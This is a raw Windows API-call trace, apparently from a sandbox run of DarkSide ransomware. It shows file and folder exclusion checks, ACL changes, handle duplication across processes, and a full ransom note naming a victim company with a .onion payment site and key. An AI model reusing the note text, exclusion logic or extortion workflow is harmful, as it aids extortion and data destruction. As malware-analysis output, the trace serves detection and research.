[0166.945] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.946] CloseHandle (hObject=0x1e4) returned 1 [0166.946] _wcsicmp (_Str1="\\My", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.946] CloseHandle (hObject=0x194) returned 1 [0166.946] CloseHandle (hObject=0x1e8) returned 1 [0166.946] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0166.946] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.946] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.947] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.947] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.948] CloseHandle (hObject=0x1e4) returned 1 [0166.948] _wcsicmp (_Str1="\\mpengine.dll", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.948] CloseHandle (hObject=0x194) returned 1 [0166.948] CloseHandle (hObject=0x1e8) returned 1 [0166.948] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xbbc) returned 0x1e8 [0166.948] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.948] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.949] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.950] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.950] CloseHandle (hObject=0x1e4) returned 1 [0166.950] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.950] CloseHandle (hObject=0x194) returned 1 [0166.950] CloseHandle (hObject=0x1e8) returned 1 [0166.950] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xbbc) returned 0x1e8 [0166.950] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.950] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.952] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.953] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.953] CloseHandle (hObject=0x1e4) returned 1 [0166.953] CloseHandle (hObject=0x194) returned 1 [0166.953] CloseHandle (hObject=0x1e8) returned 1 [0166.953] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xbbc) returned 0x1e8 [0166.953] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.953] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.954] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.955] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.955] CloseHandle (hObject=0x1e4) returned 1 [0166.955] _wcsicmp (_Str1="\\radarrs.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 4 [0166.955] CloseHandle (hObject=0x194) returned 1 [0166.956] CloseHandle (hObject=0x1e8) returned 1 [0166.956] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xbbc) returned 0x1e8 [0166.956] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x120, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.956] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.957] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.957] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.957] CloseHandle (hObject=0x1e4) returned 1 [0166.958] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.958] CloseHandle (hObject=0x194) returned 1 [0166.958] CloseHandle (hObject=0x1e8) returned 1 [0166.958] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xbbc) returned 0x1e8 [0166.958] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.958] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.959] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.960] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.960] CloseHandle (hObject=0x1e4) returned 1 [0166.960] CloseHandle (hObject=0x194) returned 1 [0166.960] CloseHandle (hObject=0x1e8) returned 1 [0166.960] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x86c) returned 0x1e8 [0166.960] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.960] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.961] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.962] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.962] CloseHandle (hObject=0x1e4) returned 1 [0166.962] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.962] CloseHandle (hObject=0x194) returned 1 [0166.962] CloseHandle (hObject=0x1e8) returned 1 [0166.962] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x86c) returned 0x1e8 [0166.962] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xb4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.962] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.963] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.964] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.964] CloseHandle (hObject=0x1e4) returned 1 [0166.964] CloseHandle (hObject=0x194) returned 1 [0166.964] CloseHandle (hObject=0x1e8) returned 1 [0166.964] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x500) returned 0x1e8 [0166.965] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.965] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.966] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.967] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.967] CloseHandle (hObject=0x1e4) returned 1 [0166.967] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.967] CloseHandle (hObject=0x194) returned 1 [0166.967] CloseHandle (hObject=0x1e8) returned 1 [0166.967] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x500) returned 0x1e8 [0166.967] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.967] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.968] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.969] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.969] CloseHandle (hObject=0x1e4) returned 1 [0166.969] CloseHandle (hObject=0x194) returned 1 [0166.969] CloseHandle (hObject=0x1e8) returned 1 [0166.969] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x500) returned 0x1e8 [0166.969] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.969] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.970] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.971] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.971] CloseHandle (hObject=0x1e4) returned 1 [0166.971] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.971] CloseHandle (hObject=0x194) returned 1 [0166.971] CloseHandle (hObject=0x1e8) returned 1 [0166.971] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x210e20) returned 1 [0166.972] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0166.972] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1f8e18) returned 1 [0166.974] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0166.974] _wcsicmp (_Str1="ntuser.ini", _Str2="README.c06622a1.TXT") returned -4 [0166.974] wcsstr (_Str="ntuser.ini", _SubStr="README") returned 0x0 [0166.974] _wcsicmp (_Str1="autorun.inf", _Str2="ntuser.ini") returned -13 [0166.974] wcslen (_String="autorun.inf") returned 0xb [0166.974] _wcsicmp (_Str1="boot.ini", _Str2="ntuser.ini") returned -12 [0166.974] wcslen (_String="boot.ini") returned 0x8 [0166.974] _wcsicmp (_Str1="bootfont.bin", _Str2="ntuser.ini") returned -12 [0166.974] wcslen (_String="bootfont.bin") returned 0xc [0166.974] _wcsicmp (_Str1="bootsect.bak", _Str2="ntuser.ini") returned -12 [0166.974] wcslen (_String="bootsect.bak") returned 0xc [0166.974] _wcsicmp (_Str1="desktop.ini", _Str2="ntuser.ini") returned -10 [0166.974] wcslen (_String="desktop.ini") returned 0xb [0166.974] _wcsicmp (_Str1="iconcache.db", _Str2="ntuser.ini") returned -5 [0166.974] wcslen (_String="iconcache.db") returned 0xc [0166.974] _wcsicmp (_Str1="ntldr", _Str2="ntuser.ini") returned -9 [0166.975] wcslen (_String="ntldr") returned 0x5 [0166.975] _wcsicmp (_Str1="ntuser.dat", _Str2="ntuser.ini") returned -5 [0166.975] wcslen (_String="ntuser.dat") returned 0xa [0166.975] _wcsicmp (_Str1="ntuser.dat.log", _Str2="ntuser.ini") returned -5 [0166.975] wcslen (_String="ntuser.dat.log") returned 0xe [0166.975] _wcsicmp (_Str1="ntuser.ini", _Str2="ntuser.ini") returned 0 [0166.975] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd98afa20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd98afa20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0166.975] _wcsicmp (_Str1="$recycle.bin", _Str2="Pictures") returned -76 [0166.975] wcslen (_String="$recycle.bin") returned 0xc [0166.975] _wcsicmp (_Str1="config.msi", _Str2="Pictures") returned -13 [0166.975] wcslen (_String="config.msi") returned 0xa [0166.975] _wcsicmp (_Str1="$windows.~bt", _Str2="Pictures") returned -76 [0166.975] wcslen (_String="$windows.~bt") returned 0xc [0166.975] _wcsicmp (_Str1="$windows.~ws", _Str2="Pictures") returned -76 [0166.975] wcslen (_String="$windows.~ws") returned 0xc [0166.975] _wcsicmp (_Str1="windows", _Str2="Pictures") returned 7 [0166.975] wcslen (_String="windows") returned 0x7 [0166.975] _wcsicmp (_Str1="appdata", _Str2="Pictures") returned -15 [0166.975] wcslen (_String="appdata") returned 0x7 [0166.975] _wcsicmp (_Str1="application data", _Str2="Pictures") returned -15 [0166.975] wcslen (_String="application data") returned 0x10 [0166.975] _wcsicmp (_Str1="boot", _Str2="Pictures") returned -14 [0166.975] wcslen (_String="boot") returned 0x4 [0166.975] _wcsicmp (_Str1="google", _Str2="Pictures") returned -9 [0166.975] wcslen (_String="google") returned 0x6 [0166.975] _wcsicmp (_Str1="mozilla", _Str2="Pictures") returned -3 [0166.975] wcslen (_String="mozilla") returned 0x7 [0166.976] _wcsicmp (_Str1="program files", _Str2="Pictures") returned 9 [0166.976] wcslen (_String="program files") returned 0xd [0166.976] _wcsicmp (_Str1="program files (x86)", _Str2="Pictures") returned 9 [0166.976] wcslen (_String="program files (x86)") returned 0x13 [0166.976] _wcsicmp (_Str1="programdata", _Str2="Pictures") returned 9 [0166.976] wcslen (_String="programdata") returned 0xb [0166.976] _wcsicmp (_Str1="system volume information", _Str2="Pictures") returned 3 [0166.976] wcslen (_String="system volume information") returned 0x19 [0166.976] _wcsicmp (_Str1="tor browser", _Str2="Pictures") returned 4 [0166.976] wcslen (_String="tor browser") returned 0xb [0166.976] _wcsicmp (_Str1="windows.old", _Str2="Pictures") returned 7 [0166.976] wcslen (_String="windows.old") returned 0xb [0166.976] _wcsicmp (_Str1="intel", _Str2="Pictures") returned -7 [0166.976] wcslen (_String="intel") returned 0x5 [0166.976] _wcsicmp (_Str1="msocache", _Str2="Pictures") returned -3 [0166.976] wcslen (_String="msocache") returned 0x8 [0166.976] _wcsicmp (_Str1="perflogs", _Str2="Pictures") returned -4 [0166.976] wcslen (_String="perflogs") returned 0x8 [0166.976] _wcsicmp (_Str1="x64dbg", _Str2="Pictures") returned 8 [0166.976] wcslen (_String="x64dbg") returned 0x6 [0166.976] _wcsicmp (_Str1="public", _Str2="Pictures") returned 12 [0166.976] wcslen (_String="public") returned 0x6 [0166.976] _wcsicmp (_Str1="all users", _Str2="Pictures") returned -15 [0166.976] wcslen (_String="all users") returned 0x9 [0166.976] _wcsicmp (_Str1="default", _Str2="Pictures") returned -12 [0166.976] wcslen (_String="default") returned 0x7 [0166.976] wcscpy (in: _Dest=0x1d1000, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0166.976] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0166.977] wcscpy (in: _Dest=0x1d1044, _Source="Pictures" | out: _Dest="Pictures") returned="Pictures" [0166.977] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1f8e18 [0166.977] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x210e20 [0166.978] wcscpy (in: _Dest=0x1f8e18, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0166.978] GetNamedSecurityInfoW () returned 0x0 [0166.979] SetEntriesInAclW () returned 0x0 [0166.979] SetNamedSecurityInfoW () returned 0x0 [0167.005] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22bde8) returned 1 [0167.005] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32eb6c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0167.005] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 1 [0167.005] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0167.005] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0167.006] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32eb3c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32eb3c*=0x7ca, lpOverlapped=0x0) returned 1 [0167.007] CloseHandle (hObject=0x1bc) returned 1 [0167.007] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0167.007] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0167.007] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="" [0167.007] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 0x2b [0167.007] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", fInfoLevelId=0x0, lpFindFileData=0x32ed9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ed9c) returned 0x154148 [0167.007] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x913d0240, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x913d0240, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.009] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0167.009] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0167.009] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0167.009] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0167.009] wcslen (_String="autorun.inf") returned 0xb [0167.009] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0167.009] wcslen (_String="boot.ini") returned 0x8 [0167.009] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0167.009] wcslen (_String="bootfont.bin") returned 0xc [0167.009] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0167.009] wcslen (_String="bootsect.bak") returned 0xc [0167.009] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0167.009] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb3acecf0, ftCreationTime.dwHighDateTime=0x1d5d7b3, ftLastAccessTime.dwLowDateTime=0xf2956fc0, ftLastAccessTime.dwHighDateTime=0x1d5ddb0, ftLastWriteTime.dwLowDateTime=0xf2956fc0, ftLastWriteTime.dwHighDateTime=0x1d5ddb0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iwvH BdfW9G", cAlternateFileName="IWVHBD~1")) returned 1 [0167.009] _wcsicmp (_Str1="$recycle.bin", _Str2="iwvH BdfW9G") returned -69 [0167.009] wcslen (_String="$recycle.bin") returned 0xc [0167.010] _wcsicmp (_Str1="config.msi", _Str2="iwvH BdfW9G") returned -6 [0167.010] wcslen (_String="config.msi") returned 0xa [0167.010] _wcsicmp (_Str1="$windows.~bt", _Str2="iwvH BdfW9G") returned -69 [0167.010] wcslen (_String="$windows.~bt") returned 0xc [0167.010] _wcsicmp (_Str1="$windows.~ws", _Str2="iwvH BdfW9G") returned -69 [0167.010] wcslen (_String="$windows.~ws") returned 0xc [0167.010] _wcsicmp (_Str1="windows", _Str2="iwvH BdfW9G") returned 14 [0167.010] wcslen (_String="windows") returned 0x7 [0167.010] _wcsicmp (_Str1="appdata", _Str2="iwvH BdfW9G") returned -8 [0167.010] wcslen (_String="appdata") returned 0x7 [0167.010] _wcsicmp (_Str1="application data", _Str2="iwvH BdfW9G") returned -8 [0167.010] wcslen (_String="application data") returned 0x10 [0167.010] _wcsicmp (_Str1="boot", _Str2="iwvH BdfW9G") returned -7 [0167.010] wcslen (_String="boot") returned 0x4 [0167.010] _wcsicmp (_Str1="google", _Str2="iwvH BdfW9G") returned -2 [0167.010] wcslen (_String="google") returned 0x6 [0167.010] _wcsicmp (_Str1="mozilla", _Str2="iwvH BdfW9G") returned 4 [0167.010] wcslen (_String="mozilla") returned 0x7 [0167.010] _wcsicmp (_Str1="program files", _Str2="iwvH BdfW9G") returned 7 [0167.010] wcslen (_String="program files") returned 0xd [0167.010] _wcsicmp (_Str1="program files (x86)", _Str2="iwvH BdfW9G") returned 7 [0167.010] wcslen (_String="program files (x86)") returned 0x13 [0167.010] _wcsicmp (_Str1="programdata", _Str2="iwvH BdfW9G") returned 7 [0167.010] wcslen (_String="programdata") returned 0xb [0167.010] _wcsicmp (_Str1="system volume information", _Str2="iwvH BdfW9G") returned 10 [0167.010] wcslen (_String="system volume information") returned 0x19 [0167.010] _wcsicmp (_Str1="tor browser", _Str2="iwvH BdfW9G") returned 11 [0167.010] wcslen 